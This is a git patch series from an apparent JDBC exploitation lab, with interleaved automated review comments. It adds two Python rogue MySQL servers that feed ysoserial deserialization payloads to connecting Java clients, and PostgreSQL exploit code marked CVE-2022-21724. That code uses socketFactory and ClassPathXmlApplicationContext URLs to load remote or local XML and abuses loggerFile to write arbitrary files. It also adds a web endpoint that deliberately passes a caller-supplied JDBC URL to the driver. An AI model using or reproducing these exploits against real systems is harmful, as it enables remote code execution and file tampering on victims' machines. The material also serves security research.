b/PyCharm/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/vcs.xml b/PyCharm/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/PyCharm/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py index e69de29..477f153 100644 --- a/PyCharm/JDBC/Mysql/convert.py +++ b/PyCharm/JDBC/Mysql/convert.py @@ -0,0 +1,3 @@ +with open("hex.txt", "r") as f: + data = bytes.fromhex(f.read()) + open("hex.pcap", "wb").write(data) \ No newline at end of file 
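Review bot: The last line of convert.py, `open("hex.pcap", "wb").write(data)`, never closes the file it opens, so the write is flushed only when the interpreter happens to collect the handle, and an exception from `write()` leaves it open. Mirror the input side: `with open("hex.pcap", "wb") as out:` followed by `out.write(data)`. A one-line module comment saying what hex.txt is expected to hold and what consumes hex.pcap would also help, since the file names are the only hint of the script's purpose.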
diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py index e69de29..7349af8 100644 --- a/PyCharm/JDBC/Mysql/fakeServer.py +++ b/PyCharm/JDBC/Mysql/fakeServer.py 
@@ -0,0 +1,100 @@ +# coding=utf-8 +import socket +import binascii +import os + +greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400" +response_ok_data="0700000200000002000000" + +def receive_data(conn): + data = conn.recv(1024) + print("[*] Receiveing the package : {}".format(data)) + return str(data).lower() + +def send_data(conn,data): + print("[*] Sending the package : {}".format(data)) + conn.send(binascii.a2b_hex(data)) + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\cc5.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='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' + return payload_content + +# 主要逻辑 +def run(): + + while 1: + conn, addr = sk.accept() + print("Connection come from {}:{}".format(addr[0],addr[1])) + + # 1.先发送第一个 问候报文 + send_data(conn,greeting_data) + + while True: + # 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok + receive_data(conn) + send_data(conn,response_ok_data) + + #其他过程 + data=receive_data(conn) + #查询一些配置信息,其中会发送自己的 版本号 + if "session.auto_increment_increment" in data: + _payload='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' + send_data(conn,_payload) + data=receive_data(conn) + elif "show warnings" in data: + _payload = 
'01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000' + send_data(conn, _payload) + data = receive_data(conn) + if "set names" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "set character_set_results" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "show session status" in data: + mysql_data = '0100000102' + mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000' + mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000' + # 为什么我加了EOF Packet 就无法正常运行呢?? 
+ # 获取payload + payload_content=get_payload_content() + # 计算payload长度 + payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + # 计算数据包长度 + data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + send_data(conn, mysql_data) + data = receive_data(conn) + if "show warnings" in data: + payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000' + send_data(conn, payload) + break + + +if __name__ == '__main__': + HOST ='127.0.0.1' + PORT = 3307 + + sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + #当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间 + sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sk.bind((HOST, PORT)) + sk.listen(1) + + print("start fake mysql server listening on {}:{}".format(HOST,PORT)) + + run() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py index e69de29..dc76486 100644 --- a/PyCharm/JDBC/Mysql/fakeServerM4x.py +++ b/PyCharm/JDBC/Mysql/fakeServerM4x.py 
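Review bot: `run()` reads `sk` as an implicit module global that exists only when the file is executed under the `__main__` guard, and the accepted `conn` is never closed, so every client socket lives until the process exits. Pass the listener in (`def run(sk):` and `run(sk)`), break out of the inner loop when `conn.recv` returns `b''`, and close the connection in a `finally:`. `receive_data` returns `str(data).lower()`, which on Python 3 is the `b'...'` repr rather than decoded text, so the `in data` substring checks work only because that repr contains the ASCII query; say so in a comment. The module also has no header docstring — one stating that it is a loopback-only lab fixture replaying a fixed sequence of canned MySQL handshake responses would help the next reader.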
@@ -0,0 +1,90 @@ +import binascii +import os +import socket +import threading + +SHOW_VARIABLES = False + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\CommonsCollections6.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='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' + return payload_content + +def get_data(pdata = b''): + global SHOW_VARIABLES + if b'SHOW VARIABLE' in pdata.upper(): + print("回显变量") + SHOW_VARIABLES = True + return "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" + elif b'SHOW WARNINGS' in pdata.upper(): + print("回显告警") + return "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000005000005fe000002006a000006075761726e696e6704313336365c496e636f727265637420737472696e672076616c75653a20275c7844365c7844305c7842395c7846415c7842315c7845412e2e2e2720666f7220636f6c756d6e20275641524941424c455f56414c55452720617420726f772034383505000007fe00000200" + elif b'SELECT @@session.auto_increment_increment'.upper() in pdata.upper(): + print("回显auto_increment_increment") + return "0100000101380000020364656600000022404073657373696f6e2e6175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a00000000005000003fe0000020002000004013105000005fe00000200" + elif b'SELECT @@session.autocommit'.upper() in pdata.upper(): + print("回显autocommit") + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + elif b'SHOW COLLATION' in pdata.upper(): + print("回显COLLATION") + return "" + elif b'SET ' in pdata.upper(): + print("回显SET包") + return "0700000200000002000000" + else: + 
print("未知请求") + print(pdata) + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + +def process(conn): + global SHOW_VARIABLES + #hello 包 + print("发送hello包") + conn.sendall(bytes.fromhex("4a0000000a352e372e32360018000000374a10207a5f771e00fff7c00200ff81150000000000000000000025551379067c13160d46727b006d7973716c5f6e61746976655f70617373776f726400")) + + # 接收登录包 + conn.recv(10240) + print("接收到登录包") + + # 登录成功包 + conn.sendall(bytes.fromhex("0700000200000002000000")) + print("给客户端响应登录成功") + + while True: + data = conn.recv(10240) + if b'SHOW SESSION STATUS' in data.upper(): + conn.sendall(bytes.fromhex("0100000103")) + conn.sendall(bytes.fromhex("1a000002036465660001610161016101610c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("1a000003036465660001610161016201620c3f001c000000fcffff0000001a000004036465660001610161016301630c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("05000005fe00000200")) + payload_content = get_payload_content() + mysql_data = "" + payload_length = str(hex(len(payload_content) // 2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + data_len = str(hex(len(payload_content) // 2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc' + payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + conn.sendall(bytes.fromhex(mysql_data)) + print("交互完成") + else: + conn.sendall(bytes.fromhex(get_data(data))) + +sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +sk.bind(("0.0.0.0", 3307)) +sk.listen(1) + +while True: + conn, addr = sk.accept() + threading.Thread(target=process, args=(conn,)).start() \ No newline at end of file 
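Review bot: The listener at the bottom of fakeServerM4x.py binds to `"0.0.0.0"`, so this fixture is reachable from every interface of the host, whereas fakeServer.py binds `127.0.0.1`; bind to loopback unless the lab deliberately needs remote clients, and state the choice in a comment. In `process()`, `conn.recv(10240)` returning `b''` (peer closed) is not handled, so a disconnected client keeps hitting the `else` branch until the socket raises inside the worker thread, and `conn` is never closed on either path; add `if not data: break` after the recv and close the socket in a `finally:`. `SHOW_VARIABLES` is declared `global` and assigned in `get_data` but never read anywhere in the hunk, so either use it or remove it.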
diff --git a/PyCharm/JDBC/Mysql/hex.pcap b/PyCharm/JDBC/Mysql/hex.pcap new file mode 100644 index 0000000000000000000000000000000000000000..d04bd062c8b9f0c925942d776b3965ed8bb32e9a GIT binary patch literal 5188 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 d4gdB-Q5@=cO@~2xZ#44z_U*$ Date: Sun, 12 Oct 2025 14:23:15 +0800 Subject: [PATCH 06/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0mysql?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../inspectionProfiles/Project_Default.xml | 8 +++++ JDBC/PostgreSql/pom.xml | 4 +-- .../src/main/java/com/test/DirectConnect.java | 6 ++-- .../main/java/com/test/StartApplication.java | 7 +++++ .../src/main/java/com/test/UrlEncodeFile.java | 12 ++++++++ .../com/test/controller/IndexController.java | 24 +++++++++++++++ 
.../src/main/java/com/test/exp/FileWrite.java | 13 ++++++++ .../main/java/com/test/exp/SocketFactory.java | 12 ++++++++ .../src/main/resources/application.yml | 2 ++ JDBC/mysql/.gitignore | 29 ++++++++++++++++++ JDBC/mysql/.idea/.gitignore | 8 +++++ JDBC/mysql/.idea/compiler.xml | 14 +++++++++ JDBC/mysql/.idea/encodings.xml | 9 ++++++ JDBC/mysql/.idea/jarRepositories.xml | 20 ++++++++++++ JDBC/mysql/.idea/misc.xml | 15 +++++++++ JDBC/mysql/.idea/modules.xml | 8 +++++ JDBC/mysql/.idea/vcs.xml | 6 ++++ JDBC/mysql/SpringTarget/pom.xml | 10 +++++- .../src/main/resources/application.yml | 2 ++ JDBC/mysql/YsoserialGadgetGenerate.bin | Bin 4060 -> 4060 bytes JDBC/mysql/final.pcap | 5 ++- JDBC/mysql/hex.bin | 0 JDBC/mysql/hex.pcap | Bin 5188 -> 5217 bytes JDBC/mysql/hex1.bin | 0 JDBC/mysql/hex1.pcap | Bin 4060 -> 4060 bytes JDBC/mysql/mysql.iml | 11 +++++++ JDBC/mysql/no-outbound/pom.xml | 15 ++++++++- .../no-outbound/src/main/java/exp/Exp.java | 16 ++++++++++ .../no-outbound/target/classes/exp/Exp.class | Bin 0 -> 1882 bytes 29 files changed, 247 insertions(+), 9 deletions(-) create mode 100644 JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml create mode 100644 JDBC/mysql/.gitignore create mode 100644 JDBC/mysql/.idea/.gitignore create mode 100644 JDBC/mysql/.idea/compiler.xml create mode 100644 JDBC/mysql/.idea/encodings.xml create mode 100644 JDBC/mysql/.idea/jarRepositories.xml create mode 100644 JDBC/mysql/.idea/misc.xml create mode 100644 JDBC/mysql/.idea/modules.xml create mode 100644 JDBC/mysql/.idea/vcs.xml create mode 100644 JDBC/mysql/hex.bin create mode 100644 JDBC/mysql/hex1.bin create mode 100644 JDBC/mysql/mysql.iml create mode 100644 JDBC/mysql/no-outbound/target/classes/exp/Exp.class diff --git a/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..4df5f76 --- /dev/null +++ b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml 
@@ -0,0 +1,8 @@ + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml index 3ca70dd..428bb21 100644 --- a/JDBC/PostgreSql/pom.xml +++ b/JDBC/PostgreSql/pom.xml @@ -18,12 +18,12 @@ org.springframework.boot spring-boot-starter-web - 2.7.15 + 2.7.13 org.postgresql postgresql - 42.3.0 + 42.3.1 diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java index b197cc3..a62fbd2 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -9,7 +9,9 @@ public static void main(String[] args) throws SQLException { Driver driver = new Driver(); String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; - String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt"; - driver.connect(url, null); + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=D:/log.txt"; + String url3 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/postgre_origin.jar!/1.xml"; + String url4 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + driver.connect(url3, null); } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java index 782a11a..7edaef0 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java 
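Review bot: The `Connection` returned by `driver.connect(url3, null)` in DirectConnect.java is never closed, and the same leak appears in the hunks for IndexController.java (`DriverManager.getConnection(url)`), FileWrite.java and SocketFactory.java (`driver.connect(...)`); wrap each in try-with-resources, e.g. `try (Connection c = driver.connect(url3, null)) { }` (needs `import java.sql.Connection;`), so the socket and driver state are released when the connect succeeds. After the switch to `url3`, the locals `url`, `url1`, `url2` and `url4` are dead, and SocketFactory.java has the same pattern with its unused `url2` and `url3`; either delete them or add a comment saying why they are kept. `main` starts before the hunk.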
@@ -1,4 +1,11 @@ package com.test; +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication public class StartApplication { + public static void main(String[] args) { + SpringApplication.run(StartApplication.class, args); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java index da75283..e0c0cde 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java @@ -1,4 +1,16 @@ package com.test; +import ch.qos.logback.core.util.FileUtil; + +import java.io.IOException; +import java.net.URLEncoder; +import java.nio.file.Files; +import java.nio.file.Paths; + public class UrlEncodeFile { + public static void main(String[] args) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get("./ascii.jar")); + String encode = URLEncoder.encode(new String(bytes), "utf-8"); + System.out.println(encode); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java index ce5482e..f19a25a 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java 
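Review bot: In UrlEncodeFile.java, `import ch.qos.logback.core.util.FileUtil;` is unused and makes a one-method utility depend on logback; delete it. `new String(bytes)` decodes the jar's bytes with the platform default charset, which is lossy for arbitrary binary and makes the printed output vary by machine, so pass the intended charset explicitly via `new String(bytes, …)`; if the module targets Java 10+, `URLEncoder.encode(String, Charset)` likewise replaces the `"utf-8"` string and its checked-exception path. The class has no comment saying what `./ascii.jar` is expected to contain or what consumes the printed output; a short header would save the next reader from guessing.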
@@ -1,4 +1,28 @@ package com.test.controller; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.ResponseBody; + +import java.io.PrintWriter; +import java.io.StringWriter; +import java.sql.DriverManager; + +@Controller public class IndexController { + + @ResponseBody + @RequestMapping("/jdbc") + public String jdbc(String url) { + try { + DriverManager.getConnection(url); + + } catch (Exception e) { + StringWriter sw = new StringWriter(); + e.printStackTrace(new PrintWriter(sw)); + return sw.toString(); + } + return "done."; + } + } diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java index d233770..ca86bc7 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java @@ -1,4 +1,17 @@ package com.test.exp; +import org.postgresql.Driver; + +import java.sql.SQLException; + +// CVE-2022-21724 +// 写入的文件前后会有其他字符 public class FileWrite { + public static void main(String[] args) throws SQLException { + String file = "file content"; + Driver driver = new Driver(); + String url1 = "jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=D:/log.txt&{{file}}"; + String replace = url1.replace("{{file}}", file); + driver.connect(replace, null); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java index df0ced7..8d153fa 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java 
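Review bot: `jdbc(String url)` in IndexController.java passes a request-supplied `url` straight to `DriverManager.getConnection(url)` and, on failure, returns the full stack trace to the HTTP caller; if this is the deliberate lab sink (it looks like one), label it so it cannot be mistaken for reference code, e.g. `// INTENTIONALLY VULNERABLE: request-controlled JDBC URL reaches DriverManager; lab use only`. For anything outside the lab, the JDBC URL and driver properties must come from server-side configuration rather than the request, and the catch block should log the exception and return a generic message instead of `sw.toString()`, since the trace discloses driver versions and class paths. A one-line Javadoc on the handler describing the `url` parameter would complete the picture.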
@@ -1,4 +1,16 @@ package com.test.exp; +import org.postgresql.Driver; + +import java.sql.SQLException; + +// 本质是调用构造方法 public class SocketFactory { + public static void main(String[] args) throws SQLException { + String url1 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url2 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + String url3 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/1.jar!/1.xml"; + Driver driver = new Driver(); + driver.connect(url1, null); + } } diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml index e69de29..54b155f 100644 --- a/JDBC/PostgreSql/src/main/resources/application.yml +++ b/JDBC/PostgreSql/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8081 \ No newline at end of file diff --git a/JDBC/mysql/.gitignore b/JDBC/mysql/.gitignore new file mode 100644 index 0000000..f68d109 --- /dev/null +++ b/JDBC/mysql/.gitignore @@ -0,0 +1,29 @@ +### IntelliJ IDEA ### +out/ +!**/src/main/**/out/ +!**/src/test/**/out/ + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache +bin/ +!**/src/main/**/bin/ +!**/src/test/**/bin/ + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/JDBC/mysql/.idea/.gitignore b/JDBC/mysql/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/JDBC/mysql/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml 
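Review bot: The new JDBC/mysql/.gitignore does not list `target/` or `.idea/`, and this same patch tracks `JDBC/mysql/no-outbound/target/classes/exp/Exp.class` and several `JDBC/mysql/.idea/*.xml` files (see the diffstat), so build output and IDE state will keep landing in the repository. Add `target/` and `.idea/` alongside the existing `out/` and `bin/` entries, keeping the `!**/src/main/**/` style exceptions if they are needed, and `git rm --cached` the already-tracked class file. A trailing newline after `.DS_Store` would also silence the `\ No newline at end of file` marker.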
diff --git a/JDBC/mysql/.idea/compiler.xml b/JDBC/mysql/.idea/compiler.xml new file mode 100644 index 0000000..51e1d07 --- /dev/null +++ b/JDBC/mysql/.idea/compiler.xml @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/encodings.xml b/JDBC/mysql/.idea/encodings.xml new file mode 100644 index 0000000..29cf8bf --- /dev/null +++ b/JDBC/mysql/.idea/encodings.xml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/jarRepositories.xml b/JDBC/mysql/.idea/jarRepositories.xml new file mode 100644 index 0000000..c364a09 --- /dev/null +++ b/JDBC/mysql/.idea/jarRepositories.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/misc.xml b/JDBC/mysql/.idea/misc.xml new file mode 100644 index 0000000..fa904e2 --- /dev/null +++ b/JDBC/mysql/.idea/misc.xml @@ -0,0 +1,15 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/modules.xml b/JDBC/mysql/.idea/modules.xml new file mode 100644 index 0000000..be9deab --- /dev/null +++ b/JDBC/mysql/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/vcs.xml b/JDBC/mysql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/mysql/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/pom.xml 